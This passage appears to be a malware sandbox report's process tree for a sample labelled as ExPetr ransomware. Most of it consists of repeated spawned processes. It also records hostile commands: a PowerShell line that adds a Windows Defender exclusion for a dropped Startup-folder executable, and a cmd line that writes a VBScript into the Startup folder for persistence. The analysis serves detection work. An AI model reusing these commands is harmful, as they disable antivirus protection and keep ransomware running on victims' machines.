      cmd.exe /c powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:696
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7924
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:3116
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:3240
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:8008
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:8936
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:8176
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:8232
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:9060
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4228
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:9716
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:3648
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:4944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:3808
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:6940
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:9788
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9364
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:4932
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9556
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:10004
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:7600
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:8120
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9632
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:6568
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9224
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:6052
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:9596
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:10080
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:8212
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:6380
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:7140
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:5652
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:7248
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:2060
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:4252
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:8612
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:9636
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:6292
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9784
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:8964
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:8348
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:6372
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:6236
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:1384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9088
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:10204
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:9488
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:6364
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:5304
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:7448
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:9716
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:9272
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:3988
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:4064
      - C:\Windows\SysWOW64\shell.exe
        
        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"
        6⤵
        
        PID:6300
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:8580
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
        5⤵
        
        PID:8620
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
      4⤵
      PID:272
- - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
    HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5772
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2568
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:2884
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:3932
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:3520
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:4568
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:3680
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:6860
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:1492
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:6956
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:428
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      Executes dropped EXE
      PID:5288
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5224
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5436
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5360
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5476
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3488
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4940
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:2888
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6212
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6756
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:6896
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4688
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:2216
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:468
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:2644
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5640
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:2892
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:5176
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4048
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:4872
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:3596
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:1448
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7176
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7204
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7260
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7304
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7360
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7388
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
      4⤵
      PID:7412
  - - C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
